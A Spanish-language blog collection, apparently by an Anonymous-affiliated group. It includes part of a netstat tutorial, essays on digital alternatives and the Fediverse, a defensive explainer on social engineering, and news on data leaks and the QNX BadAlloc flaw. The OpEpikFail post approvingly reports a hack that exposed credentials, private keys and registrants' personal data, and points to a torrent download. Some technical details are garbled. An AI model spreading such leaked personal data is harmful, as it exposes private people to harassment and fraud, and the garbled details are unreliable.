    TCPRcvCoalesce: 62853
    TCPSpuriousRtxHostQueues: 1
    TCPAutoCorking: 35128
    TCPSynRetrans: 3
    TCPOrigDataSent: 2142203
    TCPHystartTrainDetect: 33
    TCPHystartTrainCwnd: 614
    TCPDelivered: 2142975
    IpExt:
    InOctets: 2747765702
    OutOctets: 2684475930
    InNoECTPkts: 3618073

Paralelamente, además tenemos una considerable cantidad de opciones secundarias para combinar con las anteriores y así personalizar y precisar más exactamente nuestras búsquedas y consultas.

  • –verbose, -v
    Comunicar al usuario lo que está sucediendo con alto detalle. Especialmente imprime alguna información útil sobre las familias de direcciones no configuradas.
  • –wide, -W
    No truncar las direcciones IP utilizando la salida tan amplia como sea necesario. Esto es opcional por ahora para no romper los scripts existentes.
  • –numeric, -n
    Mostrar direcciones numéricas en lugar de intentar determinar nombres simbólicos de host, puerto o usuario.
  • –numeric-hosts
    Muestra las direcciones numéricas de los hosts, pero no afecta a la resolución de los nombres de puerto o de usuario.
  • –numeric-ports
    Muestra los números de puerto numéricos pero no afecta a la resolución de los nombres de host o de usuario.
  • –numeric-users
    Muestra las identificaciones numéricas de los usuarios, pero no afecta a la resolución de los nombres de host o puerto.
  • –protocol=family, -A
    Especifica las familias de direcciones (quizás mejor descritas como protocolos de bajo nivel) para las que se deben mostrar las conexiones. family es una lista separada por comas (‘,’) de palabras clave de familias de direcciones como inet, inet6, unix, ipx, ax25, netrom, econet, ddp y bluetooth. Esto tiene el mismo efecto que usar las opciones –inet|-4, –inet6|-6, –unix|-x, –ipx, –ax25, –netrom, –ddp, y –bluetooth.

    La familia de direcciones inet (Iv4) incluye sockets de protocolo raw, udp, udplite y tcp.

    La familia de direcciones bluetooth (Iv4) incluye sockets de protocolo l2cap y rfcomm.

  • -c, –continuous
    Esto hará que netstat imprima la información seleccionada cada segundo de forma continua.
  • -e, –extend
    Mostrar información adicional. Utilice esta opción dos veces para obtener el máximo detalle.
  • -o, –timers
    Incluir información relacionada con los temporizadores de red.
  • -p, –program
    Muestra el PID y el nombre del programa al que pertenece cada socket.
  • -l, –listening
    Mostrar sólo los sockets de escucha (se omiten por defecto).
  • -a, –all
    Muestra tanto los sockets que escuchan como los que no escuchan. Con la opción –interfaces, muestra las interfaces que no están en funcionamiento.
  • -F
    Imprime la información de enrutamiento de la FIB (este es el valor por defecto).
  • -C
    Imprime la información de enrutamiento de la caché de rutas.

Más información para investigar, estudiar y practicar

  • Lectura importante: «NETSTAT Command»
  • Lectura importante: «NetSTAT: A Network-based Intrussion Detection Approach»
  • Netstat en sistemas operativos GNU/Linux
  • Netstat en sistemas operativos Microsoft Windows
144 comentarios

El mito de los cuidados digitales

Publicada el 23/09/2021 por Anonymous Chile

Las decisiones tomadas entorno a la rutina digital a veces parecen más ligeras que las del mundo «AFK» o «Away From Keyboard», término que usa Peter Sunde Kolmisoppi, uno de los creadores de Pirate Bay porque considera que el «mundo real» es también el digital. Muchas veces se afrontan estas rutinas con un espíritu temporal, asumiendo que posiblemente sean transitorias. Sin embargo, comenzar esa transición si que parece acarrear el peso de una rutina tangente en el mundo «AFK».

¿Por qué cambiar la rutina digital? ¿cómo empezar a cambiarla? ¿vale la pena?

Diariamente un(a) usuarix común se ve influenciada por el contenido digital que consume, pero incluso más importante, por cómo lo consume. Noticias, opiniones, discusiones, entretenimiento: todo está presentado de diferentes formas a lo largo de Internet y sin embargo se podría decir que la experiencia de varixs usuarixs en la red está globalizada. El discurso asumido detrás de esta dinámica está en la «facilidad» de uso de algunas plataformas que dictan el ritmo de la red. Se da por supuesto (porque de hecho se repite frecuentemente en sus eslóganes) que lo que usamos es la opción fácil, de modo que tiene que haber, perdidas entre las infinitas opciones de Internet, otras opciones más complicadas. Correos más complicados, redes sociales más complicadas, sistemas operativos complejos… ¿Por qué buscar las opciones que no son las «sencillas»? Está presunción ha llegado a nosotros sin crítica alguna, se asume sin más como se asume que quien quiere buscar la fecha de nacimiento de su actor favorito debe ir a Google, o incluso preguntarle a su teléfono en voz alta. ¿Es cierto que lo que usamos en el ordenador y el móvil son las opciones sencillas?

Después de varios encontronazos de los grandes digitales (GAFAM: Google, Amazon, Facebook, Apple, Microsoft) con la ley en varios países, también se ha asumido ampliamente que el nivel de privacidad o en general respeto por los derechos de lxs usuarixs sobre su información digital es cuestionable. Sin embargo eso no ha impedido que su discurso de la facilidad de uso sea incuestionable para la mayoría de lxs usuarixs. Una visita a puertas cerradas a un centro de distribución de Amazon en España da la bienvenida a las visitantes con un gran cartel que reza «work hard, have fun» y en su interior todo el mundo está muy feliz de trabajar ahí. Al menos eso te dice la guía varias veces a lo largo de la visita, pese a que varios trabajadores empaquetan de pie y corren por los pasillos, no hablas con nadie más. El espíritu de Google es similar, colores, dibujos, «buen rollo», aunque hayan tenido varios problemas con la proposición de sus trabajadores a crear sindicatos en sus sedes estadounidenses. ¿Por qué cuestionar nada de eso? Son la opción «sencilla», frente la opción complicada y desconocida.

Los servicios y las soluciones digitales presentadas por varias de estas compañías excusan la mayor parte de sus cuestiones opacas en el cuidado de lxs usuarixs, en su esfuerzo por diseñar lo rápido, lo fácil y lo barato. Dentro de ese cuidado no cabe el cuidado de las minorías que no se adapten a sus estándares (sus propias trabajadoras a veces, por ejemplo), no cabe la construcción del autocuidado (todo tiene que pasar por su filtro panóptico donde toda la información de lxs usuarixs debe ser transparente a los ojos del sistema, pero su código y políticas son opacas), no cabe tampoco la participación y la votación sobre cambios futuros. Se presentan, sin embargo, como una opción comprometida con tu vida, tu comodidad y tu bienestar. Su paternalismo se señala como una virtud, pero no es transparente; depende por completo de la confianza ciega de lxs usuarixs, algo que tan sólo puede conseguirse con ese marketing de «buen rollo», especialmente después de los diversos problemas legales por su maltrato de datos y trabajadoras.

Asomarse a la ventana de las alternativas infunde vértigo. ¿Cómo no? Se nos ha repetido de forma constante que la alternativa es complicada, requiere tiempo, conocimientos técnicos elevados, es insegura y un montón de complicaciones más. Además existe la constante presión de que acogerse a una alternativa de un servicio te obliga a hacerlo con todos, un contrato de sangre absoluto. Todo son mitos que se han extendido tanto entre lxs usuarixs comunes como en algunas comunidades que se organizan entorno al desarrollo de los servicios alternativos. Ni la alternativa a GAFAM es complicada por definición, ni el cambio de rutina tiene que ser absoluto para ser legítimo y coherente. Desafortunadamente en un contexto en el que el dinero da visibilidad, las alternativas quedan escondidas, esperando que curiosas y comunidades les den una oportunidad.

Lxs usuarixs están a tiempo de crear una red de cuidados reales en el entorno digital, y no dejarse convencer automáticamente por el discurso irrefutable de GAFAM.

Espacios comunes digitales y tangibles

Publicada el 19/09/2021 - 19/09/2021 por Anonymous Chile

El espacio común (no necesariamente público) revela el carácter de su sociedad. De esto se hablaba hace poco en MediaLab en la exposición «Paisajes de (In)Seguridad» de Goretti Díaz Cristóbal y Cristina Martínez Aransay, una obra que trata de explicar algunos de los miedos e incomodidades que sufren las mujeres en las ciudades y los barrios. En «La ciudad de los cuidados», la doctora en arquitectura Izaskun Chinchilla analiza detalladamente mediante experimentos y ejemplos de urbanismo cómo, entre otras cosas, la facilidad de los coches y la producción en las ciudades son preferentes al desarrollo cognitivo y seguro de sus habitantes más jóvenes y en general preferentes al desarrollo de comunidades y bienestar. Explica cómo (en una muestra reducida) una serie de niñxs demuestran visión espacial y orientación necesarios para ubicarse y moverse en la ciudad mucho antes de la edad con la que es prudente dejarles pasear sin acompañantes adultos. Del tema de fomentar un urbanismo menos depredador y más sociable habla Pablo Sendra analizando la obra de Richard Sennet en «Diseñar el Desorden». Habla de la obsesión por la producción y la vigilancia masiva, la tensión a la que se someten los barrios que condiciona (tan sólo a través del espacio) la calidad de vida de lxs vecinxs.

Pablo Sendra menciona la tecnología libre en las últimas páginas de su libro pues habla del aprovechamiento de la tecnología para arquitectura y urbanismo, en donde incluye los espacios verdes, la reutilización de agua de lluvia y lxs vecinxs que tienen capacidad de decisión sobre los espacios comunes. Para las personas implicadas en la comunidad de software libre, la relación entre el uso y desarrollo de éste está vinculado a todas las teorías de urbanismo responsable. La palabra clave se centra en comunidad. Hablar de la tecnología como una herramienta al servicio de la comunidad, cuya soberanía y desarrollo es accesible, solo se comprende a través de las licencias libres. Del mismo modo que Izaskun teoriza sobre crear espacios comunes seguros centrados en el desarrollo vital de las personas y no en el consumo, los espacios digitales tienden a encerrarnos en una espiral de información obsesiva y rápida. Trasladar parte de las teorías de urbanismo responsable al desarrollo del software libre puede ser una forma de por un lado tender puentes entre disciplinas, y por otro centrarse en el bienestar de lxs usuarixs más que en los retos de la tecnología de moda.

Repensar los espacios digitales y adaptarlos a un pensamiento menos obsesivo puede crear discursos más pausados. Por ejemplo, Sendra plantea (teniendo en mente obras como ‘Building and Dwelling‘ de Sennet) espacios móviles, cambiantes, flexibles y dependientes de una organización de comunidad. Es decir: en lugar de plantear espacios individualistas altamente vigilados en las ciudades, plantea espacios comunes casi «inacabados» cuyo desarrollo dependa del vecindario que pretenda usarlo. Estos espacios serían modulares y permitirían cambiar su objetivo acorde con sus usuarixs: Un cineforum de barrio, un centro de reunión para tomar decisiones que afecten al vecindario, un sitio donde jugar al ajedrez, o una sala de presentaciones. Mediante paneles dispuestos en esos hipotéticos espacios, podrían reservarse, asignarse actividades, o anotar cosas relevantes (ideas, cuestiones)… básicamente Sendra habla en este apartado de promover la autogestión de los espacios (entre otras muchas cosas) para hacer a los barrios responsables de su entorno y más activos socialmente, por delante de las actividades a ocio consumista.

Este concepto de espacios libres puede ser análogo de lo virtual, esta comparación interesante para replantear y reformar lo que ya encontramos por las páginas del Fediverso: Espacios «inacabados» y flexibles (como los nodos de varias redes sociales), cuya soberanía la tienen sus propias usuarixs y su evolución está marcado por el cambio de éstas, y no al revés. Es decir: Son lxs usuarixs las que adaptan las plataformas a su situación y contexto, y no es la plataforma la que marca el ritmo de uso. Lo más interesante de este planteamiento, además de crear un espacio más responsable y menos dependiente del capricho de las empresas, es que en este caso las minorías no quedan aplastadas por los algoritmos de consumo, si no que tienen un espacio de desarrollo sin prisa y sin presión. Dispuesto para experimentar y crecer con la autoría descentralizada.

Cabe pensar que bajo ese sistema, las minorías violentas y peligrosas también encuentran el hueco que se le censura en los sistemas centralizados. Igual que al pensar en el espacio que describe Sendra cabe el vandalismo. Pero, ¿realmente seria un problema de menos peso que el actual? ¿habría realmente más violencia en estos espacios? Tanto en el proyecto de urbanismo de Sendra como en los espacios digitales libres el desarrollo de los espacios depende del apoyo de la misma comunidad que lo sostiene. Fomenta el desarrollo, en lugar de incentivar su destrozo. ¿Acaso no impulsan los algoritmos actuales (como describe Cathy O’Neil en «Armas de Destrucción Matemática») a imponer una media normativa en un entorno claramente diverso? ¿No se están hundiendo las realidades de las minorías en el tsunami de la información cribada de las redes? (Después de internet, Srinivasan y Fish).

Como conclusión, querría animar a repensar los entornos digitales libres no sólo como la «alternativa» si no como «el cambio» factible, y cuáles disciplinas tales como la urbanística y la arquitectura pueden inspirar a la comunidad.

179 comentarios

OpEpikFail: Anonymous hackea al servicio de alojamiento web derechista y supremacista neonazi conocido como Epik

Publicada el 17/09/2021 - 11/10/2021 por Anonymous Chile

Un ciberataque a gran escala contra el registrador de dominios y empresa de alojamiento web Epik, orquestado a manos del colectivo de activistas Anonymous, ha puesto al descubierto un enorme caudal de información privada y datos confidenciales con nombres de usuario, contraseñas de cuentas de alojamiento, claves SSH y números de tarjetas de crédito, incluidos los nombres de las personas que están detrás de algunos de los sitios web más conocidos de la extrema derecha. Entre los datos también se encuentran códigos de autentificación que son necesarios para transferir un nombre de dominio entre registradores, además de contraseñas de administrador para los inicios de sesión de sitios web WordPress.

Esta informacióon fue reportada inicialmente por el periodista independiente Steven Monacelli el día Lunes 13 de Septiembre del presente año en curso 2021, para luego ser publicada en forma de Torrent esta semana por el colectivo de activistas Anonymous. En un comunicado de prensa sobre el hackeo, bautizado como OpEpikFail, Anonymous afirmó que pudo obtener «una década de información», incluyendo registros y transferencias de dominios, credenciales de cuentas y correos electrónicos de un empleado de Epik, así como también nombres, direcciones, números de teléfono y correos electrónicos de quienes registraron dominios web para una serie de sitios relacionados con la teoría de la conspiración QAnon hasta los foros de partidarios del ex presidente de EE.UU. Donald Trump.

«Este conjunto de datos es todo lo que se necesita para rastrear la propiedad real y la gestión de la parte fascista de Internet que ha eludido a investigadores, activistas y, bueno, a casi todo el mundo», afirma el comunicado.

Según los hackers, el contenido incluye:

  • Compra de dominios
  • Transferencias de dominios
  • Historial de WHOIS
  • Cambios de DNS
  • Reenvíos de correo electrónico, listas de espera, etc.
  • Historial de pagos
  • Credenciales de la cuenta
  • Más de 500.000 claves privadas
  • El buzón de un empleado
  • Repositorios GIT
  • Los directorios /home/ y /root/ de un sistema central

Entre los clientes de Epik se encuentran sitios de redes sociales como Parler y Gab, así como foros de extrema derecha como TheDonald. Un sitio web pro-vida que instó a los residentes de Texas a denunciar a las mujeres que buscaban abortos a raíz de la sentencia del estado sobre el aborto también fue temporalmente un cliente de Epik.

El análisis sugiere que los datos hackeados llegan hasta el 28 de febrero de 2021. La publicación de los datos se produce apenas unos días después de que los hackers alineados con Anonymous desfiguraran el sitio web oficial del Partido Republicano de Texas en relación con las nuevas restricciones del estado al aborto.

Enlace de descarga Torrent

57 comentarios

Sobre las redes digitales

Publicada el 16/09/2021 - 14/03/2022 por Anonymous Chile

Cuando se habla del impacto de redes sociales se suele poner el foco en la cantidad de personas que participan activamente en éstas. Es un factor importante que sale siempre que se discute sobre el uso e impacto de redes privativas. Esta discusión aparece en muchos contextos pero generalmente cuando aparece las opiniones son muy absolutas, porque en general ha sido una decisión ya asumida. Da la sensación de que un(a) usuarix activa en una red que reconoce el impacto de las redes privativas sobre la gobernanza digital se contradice de algún modo. Y la postura «contraria» de rechazo no suele ir acompañada a una alternativa a esta popularidad, si no que suele ofrecerse como una especie de sacrificio digital. Cuando se llega a una postura que roza la tradición religiosa cabe preguntarse qué falla, sin perder el rumbo de los valores. Cabe entonces plantearse si puede discutirse del concepto de red social y cómo se utiliza; no sólo la elección del mal menor. Las ventajas y desventajas de lo que tenemos están claras en ambos extremos, pero a veces lo absoluto de estas posiciones puede eclipsar las posibilidades futuras de las redes (¡las redes las hacen lxs usuarixs!). En una red más descentralizada es posible que la información viaje más lentamente pero se refuerza la lucha contra el ableismo o el respeto en general por las otras personas que beben de las mismas fuentes. El individualismo a veces nos hace teorizar en el peor de los escenarios cuando la realidad es que, de forma quizás más silenciosa y menos morbosa, varixs usuarixs están dispuestas a aprender nuevas tecnologías que ayuden a evolucionar de forma menos tóxica junto a la tecnología. Incluso si una red está basada o inspirada en otra, puede darle la vuelta que necesita para hacerla más propensa a encajar en el mundo de forma «amable», es decir, para contextos diversos.

Algunas comunidades no centradas en la tecnología llevan años de adelanto en lo que a flexibilidad se refiere. El feminismo ha entendido varios feminismos, al igual que movimientos de barrio por la mejora de calidad de vida de lxs vecinxs. El equilibrio entre no perder el rumbo de un objetivo y adaptarlo a las personas en un mundo real es una maniobra complicada. Las empresas juegan a crear realidades, pero el software libre debería ser la opción para abarcar todas las realidades. En «Diseñando el desorden», un ensayo sobre el impacto del diseño de las ciudades sobre la vida de sus habitantes y la sociedad, se explica que una estructura flexible y abierta que permite a lxs vecinxs adaptar el espacio a sus necesidad creará una cooperación mucho menos forzada. Las redes digitales deberían beber de este concepto, y en lugar de copiar comportamientos de lo que ya conocemos, promover la experimentación de espacios que requieran crearse para encontrar sentido. Ramesh Srinivasan, que investiga el impacto social de la tecnología desde una perspectiva lo menos centralizada posible, explica en «Después de Internet» como una colectivo por la tradición de varias comunidades nativo americanas crearon un software llamado Paz Tribal adaptado a sus necesidades. Esto quiere decir que estaba adaptado a sus roles, a sus tradiciones y a su jerarquía, y les funcionaba mucho mejor de lo que les podría funcionar Facebook, llegado el caso. El proyecto no hubiera sido posible si el valor técnico no hubiera dejado espacio al valor de los requisitos de la comunidad.

¿Cuál sería el objetivo de las redes en este caso? ¿Es el mismo que lo que existe ahora? Cuando se hace una disección pausada de las redes, aunque se planteen como métodos de comunicación y movimiento (que lo son), plantean una comunicación precaria, corta y fugaz, en la mayoría de los casos. Tan rápida, tan corta y tan fugaz que a veces no hay tiempo de plantearse si es esa la comunicación que se quiere establecer realmente. Es aquí donde realmente la cuña de las redes sociales privativas tienen más peso, en realidad: Una empresa privativa creará realidades en las que encajar, el objetivo es que lxs usuarixs se adapten a ello para prevalecer en el flujo de información. Es el sistema perfecto porque las personas que no fluyen al ritmo que se dicte quedan fuera del algoritmo y se invisibiliza esa necesidad. Esto es lo que hace que se necesiten proyectos como Paz Tribal, porque no todas las personas ni todas las comunidades siguen las mismas reglas. En este momento es donde el espíritu del conocimiento y las licencias libres tiene la relevancia real más allá de un hobby de DIY, si no que crece para crear realidades; no sólo es una competencia gratuita para las redes privativas, si no una comunidad que crea para adaptarse a realidades.

Ingeniería social: ¿qué es y cómo protegernos?

Publicada el 12/09/2021 - 06/10/2021 por Anonymous Chile

Una cadena es tan fuerte como su eslabón más débil.

El eslabón más débil de la ciberseguridad es el usuario.

De la amalgama elaborada a partir de estas dos citas, podemos inferir que, aunque tengamos la mejor infraestructura para defendernos de los ciberataques, un usuario con la guardia baja puede poner toda esa infraestructura en serio peligro. Y es que el factor humano juega un papel muy importante en que nuestra información y sistemas no se vean comprometidos. Los ataques de ingeniería social están muy a la orden del día, y del nivel de concienciación de los usuarios, dependerá que el porcentaje de éxito de estos ataques no sea elevado.

La debilidad que supone el factor humano es conocida por los cibercriminales, que intentarán persuadir y manipular a los usuarios, entrando aquí en juego la ingeniería social.

¿Qué es la ingeniería social?

La ingeniería social es “cualquier acto que influencia una persona para que realice acciones que puede o no estar entre sus intereses.
(Christopher Hadnagy, 2018).

Cabe mencionar que la Ingeniería social es tan vieja como el ser humano, ya que desde los tiempos más remotos se vienen utilizando diferentes trucos, engaños o juegos con el fin de sacar alguna ventaja sobre otra(s) persona(s). Si nos detenemos a pensar un momento, podemos contemplar y entender que todx(s) hacemos ingeniería social durante toda nuestra vida, en cada uno de esos momentos u ocasiones en que intentamos obtener algo de otrx(s), algún beneficio, algún acceso o tipo de información sobre cualquier cosa que nos ayude de alguna forma a avanzar en algo para conseguir nuestros diferentes objetivos según sea el caso.

En el ámbito de la ciberseguridad, un atacante manipulará a una persona a través de técnicas psicológicas y habilidades sociales para conseguir información de su interés y/o ganar acceso a sistemas. Teniendo en cuenta la máxima de que el usuario es el eslabón más débil dentro de la ciberseguridad, podemos apreciar como la ingeniería social cuenta con varias ventajas que hacen que su uso sea realmente interesante: Los ataques basados en ingeniería social son ataques bastante efectivos, sencillos y baratos de llevar a cabo. Todo esto sin olvidar el alto impacto que estos ataques pueden causar, ya que podrían conseguir cualquier información nuestra o de la organización y quedarse con credenciales. Además es muy probable que pasen desapercibidos para la víctima.

Si hablamos de ingeniería social, es obligatorio hablar de Kevin Mitnick, uno de los hackers más famosos de la historia, que dice en su libro “The Art of Deception” que la Ingeniería Social “utiliza la influencia y la persuasión para engañar a las personas, convenciéndolas, mediante la manipulación, de que el ingeniero social es alguien que no es. Como resultado, el ingeniero social es capaz de aprovechar a las personas para obtener información con o sin el uso de tecnología”.

Además, Mitnick asegura que el éxito de la Ingeniería Social radica de las siguientes pautas:

  • Todx(s) queremos ayudar.
  • No nos gusta decir que no.
  • La primera actitud suele ser de confianza hacia otra persona.
  • Nos gusta que nos alaben.

Estas pautas las podemos combinar con los 6 principios de la persuasión que Robert Cialdini nombra en su libro “Influence: the psychology of persuasion” y que comentaremos a continuación. Es importante que tengamos estos principios muy en cuenta, ya que el hecho de conocerlos nos permitirá que nuestras pruebas de Ingeniería Social en entornos controlados tengan éxito, y sobre todo, nos permitirá identificarlos cuando estemos siendo víctimas nosotros.

Principios de persuación e influencia

  • Reciprocidad: Las personas tratan a los demás, como perciben que los demás los tratan a ellos. Esto puede llevar a que cuando damos algo, a cambio siempre nos devolverán una recompensa. Este principio lo podemos ver plasmado cuando nos ofrecen algo a cambio de dar alguna información.
  • Compromiso y coherencia: Las personas realizan acciones que son más consistentes con lo que ya han hecho en el pasado y se tiende a ser consecuentes con las decisiones tomadas. Un ejemplo de este principio es cuando alguien nos pide ayuda y nosotros aceptamos. Tras ayudarle con cuestiones sencillas, nos plantea algo que de por si no realizaríamos, pero como previamente nos comprometimos a ayudarle es probable que accedamos a realizar su petición.
  • Aprobación social: Las personas tienden a sumarse a la opinión mayoritaria. Cuando una persona tiene que realizar alguna acción, le dará menos reparo si esta acción también la realizó un grupo de personas.
  • Autoridad: Las personas con cierto liderazgo o notoriedad gozan de mayor credibilidad. En el caso de un ataque de IS, hacerse pasar por un jefe dará más opciones de obtener cierta información de algún empleado (siempre dependiendo del contexto).
  • Simpatía: Una persona que sea simpática y/o atractiva a otra, tiene mayor persuasión. El llamado Efecto Halo, hace que atribuyamos más cualidades positivas a personas que nos parecen atractivas. Mediante esta atracción hace que sea más sencillo establecer vínculos de confianza.
  • Escasez: Las personas tienden a dar más valor a aquello que perciben como escaso y/o exclusivo. Es por esto que los ataques de ingeniería social suelen jugar con la urgencia (escasez de tiempo) y ofertas con descuentos increíbles, pues la víctima lo verá como una oportunidad y actuará sin pensarlo dos veces.

El siguiente vídeo habla en detalle de la Ingeniería Social y los principios de Robert Cialdini aplicados a esta

Fases de ingeniería social

  • Recolección de información: Obtener información sobre la víctima para ir creando un vector de ataque.
  • Relación de confianza: En base a la información obtenida en la fase anterior, se prepara un gancho con el que atraer a la víctima y establecer confianza.
  • Manipulación: Ejecución del ataque en el que se buscará conseguir determinado objetivo.
  • Salida: Se corta la interacción con la víctima y se intentan borrar las huellas.

Aquí podrás ver una completa infografía sobre el ciclo de la ingeniería social preparada por la Oficina de Seguridad del Internauta (OSI).

Ataques de ingeniería social

Dependiendo del número de interacciones que requieran por parte del ciberdelincuente encontramos 2 tipos:

  • Hunting: Con una interacción, buscan afectar al mayor número de usuarios. Suele ser propio cuando se necesita un dato concreto (por ejemplo: unas credenciales). Con el menor contacto posible se incita a la víctima a realizar una acción, y así una vez conseguido, desaparecer.
  • Farming: Los ciberdelincuentes harán varias interacciones con la víctima, con el fin de poder obtener más información y afinar el ataque. Aquí se buscará establecer cierta relación con la víctima, muchas veces con una identidad falsa, con el fin de conseguir la mayor información posible.

Para llevar a cabo los ataques se utilizan diferentes técnicas, dependiendo de la imaginación del ciberdelincuente y cuáles son sus objetivos. Es interesante recalcar que los ataques de ingeniería social se pueden hacer a través de internet, por teléfono, SMS, fisicamente, etcétera. Todo dependerá de la necesidad del atacante. A continuación vemos algunas de las técnicas más utilizadas:

  • Phishing: Técnica de suplantación de identidad mediante correos fraudulentos que buscan redirigir a la víctima a una web falsa y así conseguir extraerle información o infectar su equipo.
  • Pretexting: Los atacantes se harán pasar por otra persona o entidad con el fin de ganar la máxima confianza con nosotros, y así recabar nuestra información.
  • Baiting: Busca atraer a la víctima con un cebo que pueda ser jugoso para esta. Basándose en la curiosidad que genera la sensación de oportunidad de este cebo, conseguirán recopilar información. Hay variedad de formas de llevar a cabo esta técnica, una muy conocida es el USB Baiting, en la que el atacante simulará dejar olvidada una memoria USB con malware, en algún lugar público, y esperando a que cualquier persona lo encuentre y lo conecte a su equipo con la curiosidad y buena fe de devolver el pendrive a su dueño.
  • Tailgating: Perseguir a una persona para tener acceso físico a un área restringida. Por ejemplo: El atacante se puede valer de la cortesía de la víctima pidiéndole que le sujete la puerta mientras simula ir de repartidor cargado.
  • Shoulder Surfing: Consiste en mirar por encima del hombro cuando un usuario está introduciendo información sensible.
  • Dumpster Diving: Consiste en mirar en la basura en busca de algo que pueda revelar información. Ya lo dice el dicho “La basura de un hombre, puede ser el tesoro de otro”. Para evitar problemas es muy recomendable destruir documentos antes de tirarlos a la basura.

¿Cómo defendernos y prevenir la ingeniería social?

Todos sabemos que es imposible garantizar la seguridad al 100%, ya sea por la máquina, sistema, red, plataforma, servicio o usuario, pero quizas algunas buenas prácticas serían útiles para ayudar a prevenir o cuidarnos un poco de ciertas cosas.

  • Concienciación: Ser conocedor de estos ataques, el impacto que tienen, y las técnicas que utilizan es algo fundamental para reducir el porcentaje de opciones de ser víctimas de ellos. Por ello la formación en seguridad es imprescindible.
  • Ser cuidadoso con que información se hace pública: Hay que ser cuidadoso con todo lo que compartimos.
  • No abrir links ni adjuntos sospechosos: Esto es algo que ya nos dicen las madres desde muy pequeños! “No aceptes cosas de desconocidos”.
  • No tener confianza ciega y contrastar: Siempre contrastar fuentes oficiales. Puede parecer muy interesante un correo que diga que X tienda tenga los productos con descuentos del 70%, pero la mejor forma de saberlo es comprobando las páginas oficiales de esa tienda X.
  • Política de contraseñas y 2FA: Como siempre emplear una contraseña robusta, cambiarla cada cierto tiempo y no repetirla en diferentes servicios. Con 2FA (doble factor de autenticación) daremos una capa extra de protección a nuestra cuenta.
  • Protección dispositivos: Mantener siempre actualizado el SO y el antivirus.
  • Verificar la seguridad de las webs donde introducimos datos personales.

En resumen, lo importante para prevenir la Ingeniería social son la concienciación y la formación. Por ello es muy recomendable seguir a diferentes blogs de ciberseguridad y mantenerse actualizado.

Como podemos observar, un ataque de Ingeniería Social puede tener consecuencias devastadoras para aquel que lo sufre. Las características de este tipo de ataques y la aceleración en la digitalización durante la pandemia, llevan a que el número de ataques como el phising se haya incrementado (Muchas veces utilizando la propia pandemia como gancho) Por eso es importante prestar siempre mucha atención. Además, es importante recordar que estos ataques nos pueden llegar por cualquier medio, e incluso físicamente, por lo tanto la atención y conciencia las tenemos que mantener como un hábito. Como siempre, es imposible alcanzar una seguridad del 100%, pero estar informado y concienciado sobre esta práctica, ayudará a reducir el porcentaje de éxito de esos ciberatacantes que quieran algo de nosotros.

Como un apoyo extra para complementar y englobar la presente temática, quizás sería oportuno o apropiado visualizar el siguiente vídeo:

25 comentarios

Plataforma de Microsoft Power Apps expone por error 38 millones de registros privados

Publicada el 09/09/2021 por Anonymous Chile

Upguard Research revela múltiples fugas de datos que exponen 38 millones de registros de datos a través de los portales de Microsoft Power Apps mal configurados para permitir el acceso público. Según la empresa, las filtraciones de datos afectaron a American Airlines, Microsoft, J.B. Hunt y los gobiernos de Indiana, Maryland y la ciudad de Nueva York. UpGuard comunicó inmediatamente el problema a Microsoft, que llegaron a la conclusión que no se trataba de un fallo de seguridad, sino de una función de la aplicación. No obstante, modificaron la configuración por defecto para evitar futuros problemas de privacidad.

Microsoft Power Apps son herramientas que permiten diseñar aplicaciones y crear sitios web públicos y privados de forma rápida y que permiten acceder fácilmente a datos de la organización. Los datos personales de millones de personas de varias partes del mundo quedaron expuestos al público debido a una débil configuración de seguridad de Microsoft Power Apps. Se trata de una plataforma utilizada para crear aplicaciones personalizadas en la nube, en pocas horas y sin conocimientos de programación.

Esto dio como resultado que datos confidenciales como números de seguro social, nombres, teléfonos y direcciones de correo electrónico de estadounidenses fueran expuestos en la red. Pero el problema también alcanzó la órbita privada, afectando a compañías como American Airlines y la propia Microsoft. Los datos confidenciales, incluidos los estados de vacunación contra COVID-19, los números de seguridad social y las direcciones de correo electrónico, han sido expuestos debido a configuraciones predeterminadas débiles para Microsoft Power Apps.

Upguard descubrió por primera vez el problema relacionado con la OData (Open Data Protocol) APIs para un portal de Power Apps el 24 de mayo y envió un informe de vulnerabilidad a Microsoft el 24 de junio. Según Upguard, el problema principal es que todos los tipos de datos eran públicos cuando algunos datos, como la información de identificación personal, deberían haber sido privados. La mala configuración hizo que aparecieran algunos datos privados.

142 comentarios

Vulnerabilidad crítica en QNX de Blackberry compromete seguridad en millones de automóviles

Publicada el 09/09/2021 por Anonymous Chile

Un fallo crítico llamado «BadAlloc» en QNX RTOS de BlackBerry pone en peligro a más de 200 millones de coches y equipamiento en hospitales, La vulnerabilidad registrada como CVE-2021-22156 tiene una puntuación de gravedad CVSS 9 sobre 10. La actitud de BlackBerry, que ha escondido el problema y hasta hace poco no ha hecho la llamada «revelación responsable» de información de seguridad y vulnerabilidades. BlackBerry anunció en Junio del presente año 2021 cómo QNX RTOS está embebido en 195 millones de vehículos de fabricantes como BMW, Ford, Honda, Mercedes-Benz, Toyota o Volkswagen, pero su alcance es aún mayor y hay otros segmentos en los que este sistema operativo es también fundamental.

  • La empresa licencia QNX a OEMs, que luego integran ese sistema operativo en dispositivos para sus clientes.
    En BlackBerry le dijeron al gobierno que no sabían dónde acababa su software, y que no tenían intención de hacer un anuncio público: la idea era avisar en privado a los clientes potencialmente afectados.
  • BlackBerry ha licenciado QNX a múltiples fabricantes de dispositivos que necesitaban un sistema operativo en tiempo real (RTOS) para sectores de lo más diversos, desde motor hasta medicina, siempre para casos en los que una fracción de segundo puede marcar la diferencia.

La vulnerabilidad, identificada como CVE-2021-22156 puede ser explotada remotamente y puede llevar a la ejecución de código arbitrario y a forzar la denegación de servicio del sistema afectado. Un conjunto de riesgos más que suficiente como para que BlackBerry hubiera informado inmediatamente sobre ello, se hubiera puesto manos a la obra para solucionarlo, y en este momento los parches para los dispositivos afectados ya estuvieran en camino.

El problema afecta a versiones de QNX RTOS de 2012 y anteriores y por lo tanto las versiones modernas del sistema operativo, que como indica el sitio web oficial tienen un amplio alcance en el mundo de la automoción, están a salvo.

El pasado mes de Abril Microsoft avisó de la presencia de una vulnerabilidad llamada BadAlloc que afectaba a diversas versiones de sus sistemas operativos. El problema era grave, pero en Microsoft trabajaron junto al CISA (Cybersecurity and Infrastructure Security Agency) en EE.UU. para resolverlo y alertar a las agencias y organismos de que actualizaran sus sistemas cuando se publicó el parche poco después.

¿Qué harías si descubres una vulnerabilidad en un software que es parte fundamental de millones de coches (o motocicletas) y dispositivos santiario? En BlackBerry no dijeron nada: sabían que su sistema operativo en tiempo real, QNX, podía estar afectado, pero prefirieron negar cualquier problema.

